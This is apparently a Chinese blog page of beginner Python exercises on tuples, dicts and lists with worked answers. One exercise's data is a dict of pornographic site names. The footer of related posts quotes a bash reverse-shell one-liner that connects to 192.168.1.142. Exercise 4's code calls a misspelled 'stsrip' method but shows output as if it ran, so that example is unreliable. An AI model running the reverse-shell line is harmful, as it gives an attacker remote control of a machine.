python基础数据类型-练习
1,有如下变量(tu是个元祖),请实现要求的功能
tu = ("alex", [11, 22, {"k1": 'v1', "k2": ["age", "name"], "k3": (11,22,33)}, 44])
a. 讲述元祖的特性
1)元祖tuple是一个只读列表,只可以查看,不可以修改增加和删除;
2)在定义只有一个元素的元祖时,要加上逗号以示和小括号的区别,如 age = (18, )
b. 请问tu变量中的第一个元素 “alex” 是否可被修改?
答:不可以,它直接属于元组tu的元素。
c. 请问tu变量中的"k2"对应的值是什么类型?是否可以被修改?如果可以,请在其中添加一个元素 “Seven”
答:"k2"对应的值是列表类型;列表里面的元素可以被修改。
tu[1][2]['k2'].append('Seven')
print(tu)
效果:
('alex', [11, 22, {'k2': ['age', 'name', 'Seven'], 'k1': 'v1', 'k3': (11, 22, 33)}, 44])
d. 请问tu变量中的"k3"对应的值是什么类型?是否可以被修改?如果可以,请在其中添加一个元素 “Seven”
答:"k3"对应的值是元组类型,不可以被修改。
强行修改会报错,告诉你元祖类型的对象没有append的方法。
如:
tu[1][2]['k3'].append('Seven')
AttributeError: 'tuple' object has no attribute 'append'
# 不过作为键值,k3对应的值倒可以被直接替换成另一个元祖数据,例如:
# tu[1][2]['k3'] = (11, 22, 33, 'Seven' )
# print(tu)
# 会显示出有Seven在的新元祖。
2, 字典dic,dic = {'k1': "v1", "k2": "v2", "k3": [11,22,33]}
a. 请循环输出所有的key
dic = {'k1': "v1", "k2": "v2", "k3": [11, 22, 33]}
for i in dic:print(i)
b. 请循环输出所有的value
for i in dic.values():
print(i)
c. 请循环输出所有的key和value
for i in dic.items():
print(i)
d. 请在字典中添加一个键值对,"k4": "v4",输出添加后的字典
dic['k4'] ='v4'
print(dic)
效果:
{'k2': 'v2', 'k3': [11, 22, 33], 'k4': 'v4', 'k1': 'v1'}
e. 请在修改字典中 “k1” 对应的值为 “alex”,输出修改后的字典
dic['k1'] = 'alex'
print(dic)
效果:
{'k2': 'v2', 'k1': 'alex', 'k3': [11, 22, 33]}
f. 请在k3对应的值中追加一个元素 44,输出修改后的字典
dic['k3'].append(44)
print(dic)
效果:
{'k2': 'v2', 'k3': [11, 22, 33, 44], 'k1': 'v1'}
g. 请在k3对应的值的第 1 个位置插入个元素 18,输出修改后的字典
dic['k3'].insert(0, 18)
print(dic)
效果:
{'k3': [18, 11, 22, 33], 'k2': 'v2', 'k1': 'v1'}
3,av_catalog = {
"欧美":{
"www.youporn.com": ["很多免费的,世界最大的","质量一般"],
"www.pornhub.com": ["很多免费的,也很大","质量比yourporn高点"],
"letmedothistoyou.com": ["多是自拍,高质量图片很多","资源不多,更新慢"],
"x-art.com":["质量很高,真的很高","全部收费,屌丝请绕过"]
},
"日韩":{
"tokyo-hot":["质量怎样不清楚,个人已经不喜欢日韩范了","verygood"]
},
"大陆":{
"1024":["全部免费,真好,好人一生平安","服务器在国外,慢"]
}
}
# 1,给此 ["很多免费的,世界最大的","质量一般"]列表第二个位置插入一个元素:'量很大'。
print(av_catalog['欧美']['www.youporn.com'])
av_catalog['欧美']['www.youporn.com'].insert(1,'量很大')
print(av_catalog['欧美']['www.youporn.com'])
效果对比:
['很多免费的,世界最大的', '质量一般']
['很多免费的,世界最大的', '量很大', '质量一般']
# 2,将此 ["质量很高,真的很高","全部收费,屌丝请绕过"]列表的 "全部收费,屌丝请绕过" 删除。
print(av_catalog['欧美']['x-art.com'])
av_catalog['欧美']['x-art.com'].pop()
print(av_catalog['欧美']['x-art.com'])
效果对比:
['质量很高,真的很高', '全部收费,屌丝请绕过']
['质量很高,真的很高']
# 3,将此 ["质量很高,真的很高","全部收费,屌丝请绕过"]列表的 "全部收费,屌丝请绕过" 删除。
同上
# 4,将此["质量怎样不清楚,个人已经不喜欢日韩范了","verygood"]列表的 "verygood"全部变成大写。
print(av_catalog['日韩']['tokyo-hot'])
av_catalog['日韩']['tokyo-hot'][1] = av_catalog['日韩']['tokyo-hot'][1].upper()
print(av_catalog['日韩']['tokyo-hot'])
效果对比:
['质量怎样不清楚,个人已经不喜欢日韩范了', 'verygood']
['质量怎样不清楚,个人已经不喜欢日韩范了', 'VERYGOOD']
# 5,给 '大陆' 对应的字典添加一个键值对 '1048' :['一天就封了']
print(av_catalog['大陆'])
av_catalog['大陆'].setdefault('1048',['一天就封了'])
print(av_catalog['大陆'])
效果对比:
{'1024': ['全部免费,真好,好人一生平安', '服务器在国外,慢']}
{'1048': ['一天就封了'], '1024': ['全部免费,真好,好人一生平安', '服务器在国外,慢']}
# 6,删除此"letmedothistoyou.com": ["多是自拍,高质量图片很多","资源不多,更新慢"]键值对。
av_catalog['欧美'].pop('letmedothistoyou.com')
print('letmedothistoyou.com' in av_catalog['欧美'])
返回的值是False,证明删除了。
# 7,给此["全部免费,真好,好人一生平安","服务器在国外,慢"]列表的第一个元素,加上一句话:'可以爬下来'
print(av_catalog['大陆']['1024'][0])
av_catalog['大陆']['1024'][0] = av_catalog['大陆']['1024'][0] + '可以爬下来'
可以简写成 av_catalog['大陆']['1024'][0] += '可以爬下来' (和count += 1,自增一样)
print(av_catalog['大陆']['1024'][0])
显示对比:
全部免费,真好,好人一生平安
全部免费,真好,好人一生平安可以爬下来
4、有字符串"k:1|k1:2|k2:3|k3:4" 处理成字典 {'k':1,'k1':2....}
k = "k:1|k1:2|k2:3|k3:4"
dk = { }
for i in k.strip().split('|'):
i = i.stsrip().split(':')
# print(i) 调试用,
# i[0]之类己经是直接指代字符串了,不需要再加''引住。i[1]注意要int转换成整数型。
dk.setdefault(i[0], int(i[1]))
print(dk)
参考
s = 'k:1|k1:2|k2:3|k3:4'
dic = {}
for i in s.strip().split('|'):
i = i.stsrip().split(':')
dic[i[0].strip()] = int(i[1])
print(dic)
结果:
{'k2': 3, 'k1': 2, 'k3': 4, 'k': 1}
5、元素分类
有如下值li= [11,22,33,44,55,66,77,88,99,90],将所有大于 66 的值保存至字典的第一个key中,将小于 66 的值保存至第二个key的值中。
即: {'k1': 大于66的所有值列表, 'k2': 小于66的所有值列表}
li = [11, 22, 33, 44, 55, 66, 77, 88, 99, 90]
dic = { }
l1 = [ ]
l2 = [ ]
for i in li:
if i > 66:
l1.append(i)
if i < 66:
l2.append(i)
#print(l1, l2)
dic.setdefault('k1', l1)
dic.setdefault('k2', l2)
print(dic)
效果:
{'k2': [11, 22, 33, 44, 55], 'k1': [77, 88, 99, 90]}
参考:
li = [11, 22, 33, 44, 55, 66, 77, 88, 99, 90]
dic = {'k1':[ ], 'k2':[ ]}
for i in li:
if i > 66:
dic['k1'].append(i)
if i < 66:
dic['k2'].append(i)
print(dic)
扩展:(直接在for循环里实施添加,而不是提前生成了一个字典)
li = [11, 22, 33, 44, 55, 77, 88, 99, 90]
result = {}
for row in li:
result.setdefault('k1', [])
result.setdefault('k2', [])
if row > 66:
result['k1'].append(row)
if row < 66:
result['k2'].append(row)
print(result)
6、输出商品列表,用户输入序号,显示用户选中的商品
商品 li = ["手机", "电脑", '鼠标垫', '游艇']
要求:1:页面显示 序号 + 商品名称,如:
1 手机
2 电脑
…
2: 用户输入选择的商品序号,然后打印商品名称
3:如果用户输入的商品序号有误,则提示输入有误,并重新输入。
4:用户输入Q或者q,退出程序。
li = ["手机", "电脑", '鼠标垫', '游艇']
while True:
for i in range(len(li)):
print(str(i+1) + ' ' + li[i])
sn = input('选择商品序号(按Q/q回车退出):').strip().upper()
if sn == 'Q':
print("请慢走")
break
if not sn.isdigit() or int(sn) > len(li):
print('请重新输入正确的商品序列号:')
continue
print(li[int(sn)-1])
上面的考虑还不够周全,没有考虑到输入0的情况。
参考:
li = ["手机", "电脑", '鼠标垫', '游艇']
while True:
for i in li:
print('{}\t{}'.format(li.index(i)+1, i)) #格式化输出,中间多了个空格符
num = input('请输入商品序号:q/Q退出' ).strip()
if num.isdigit():
num = int(num)
if num > 0 and num <= len(li):
print(li[num - 1])
else:
print('你输入的选项超出范围,请重新输入')
elif num.upper() == 'Q':break
else:
print('输入的有非法数字,请重新输入')
python基础数据类型-练习的更多相关文章
- Python基础数据类型-列表(list)和元组(tuple)和集合(set)
Python基础数据类型-列表(list)和元组(tuple)和集合(set) 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 本篇博客使用的是Python3.6版本,以及以后分享的 ...
- Python基础数据类型-字符串(string)
Python基础数据类型-字符串(string) 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 本篇博客使用的是Python3.6版本,以及以后分享的每一篇都是Python3.x版 ...
- python基础数据类型考试题
Python基础数据类型考试题 考试时间:两个半小时 满分100分(80分以上包含80分及格) 一,基础题. 1,简述变量命名规范(3分) 2,字节和位的关系 ...
- 1--Python 入门--Python基础数据类型
一.Python基础语法 初次使用Python,首先要明确三点: Python的标识符(例如变量名.函数名等),可用字母.数字和下划线构成,不能以数字开头,且区分大小写. Python对于缩进敏感.在 ...
- python 基础数据类型之list
python 基础数据类型之list: 1.列表的创建 list1 = ['hello', 'world', 1997, 2000] list2 = [1, 2, 3, 4, 5 ] list3 = ...
- Python基础数据类型-字典(dict)
Python基础数据类型-字典(dict) 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 本篇博客使用的是Python3.6版本,以及以后分享的每一篇都是Python3.x版本的哟 ...
- Python基础数据类型题
Python基础数据类型 题考试时间:三个小时 满分100分(80分以上包含80分及格)1,简述变量命名规范(3分) 1.必须是字母,数字,下划线的任意组合. 2.不能是数字开头 3.不能是pytho ...
- Python基础数据类型之字符串
Python基础数据类型之字符串 一.Python如何创建字符串 在python中用引号将一些文本包起来就构成了字符串(引号可以是单引号.双引号.单三引号,双三引号,它们是完全相同的) >> ...
- Python基础数据类型之集合
Python基础数据类型之集合 集合(set)是Python基本数据类型之一,它具有天生的去重能力,即集合中的元素不能重复.集合也是无序的,且集合中的元素必须是不可变类型. 一.如何创建一个集合 #1 ...
- 老男孩Python==基础数据类型考试题
转载 # Python基础数据类型考试题 # 考试时间:两个半小时 满分100分(80分以上包含80分及格) # 一,基础题. # 1, 简述变量命名规范(3分) # 1.变量由字母.数字.下划线任意 ...
随机推荐
- WinForm 设置窗体启动位置在活动屏幕右下角
WinForm 设置窗体启动位置在活动屏幕右下角 在多屏幕环境下, 默认使用鼠标所在的屏幕 1. 设置窗体的 StartPosition 为 FormStartPosition.Manual. 2. ...
- ASP.NET - Validators
ASP.NET validation controls validate the user input data to ensure that useless, unauthenticated, or ...
- 反弹shell以及端口转发的方法收集
Bash bash -i >& /dev/tcp/192.168.1.142/80 0>&1 exec 5<>/dev/tcp/192.168.1.142/80 ...
- java基础之集合框架--使用ArrayList类动态 存储数据
一.ArrayList是List接口下的一个实现类,实现了长度可变的.连续的数组:拥有数组的特性. 遵循了LIst的规则:不唯一的.有序的. 如果没有增加泛型的话,集合中可以添加任何类型的数据. 使用 ...
- docker笔记(3) ------Django项目的docker部署
2019-01-12 14:23:18 django容器连接到mysql_server容器分析:原myblog项目使用sqlit3数据库,使用mysql容器前需要在django中加入pymysql ...
- LeetCode--034--在排序数组中查找元素的第一个和最后一个位置(java)
给定一个按照升序排列的整数数组 nums,和一个目标值 target.找出给定目标值在数组中的开始位置和结束位置. 你的算法时间复杂度必须是 O(log n) 级别. 如果数组中不存在目标值,返回 [ ...
- 事务,mybatis
数据库事务:一件完整的事情, 要么全部成功,要么就全部失败 金典案例:转账 A给B转账:100 A:-100 B:+100 如何开启事务: Start transaction; 之前的转账操作(如果在 ...
- mtcnn
1.widerface样本标签处理 图片名 x1 y1 x2 y2 x11 y11 x22 y22 多人脸框 # -*- coding: utf- -*- ""&qu ...
- CF #552(div3)F 背包问题
题目链接:http://codeforces.com/contest/1154/problem/F 题意:一个商店有n个物品,每个物品只能买一次,同时有m种优惠,即一次买够x件后,这x件中最便宜的k件 ...
- Mac OS X 操作系统下JDK安装与环境变量配置
1. 下载JDK. 去oracle官网的Java SE Downloads页面(如图 1),下载Mac os版本JDK(如图 2): 图 1 图 2 2. 安装JDK. 下载完成后,双击.dmg文 ...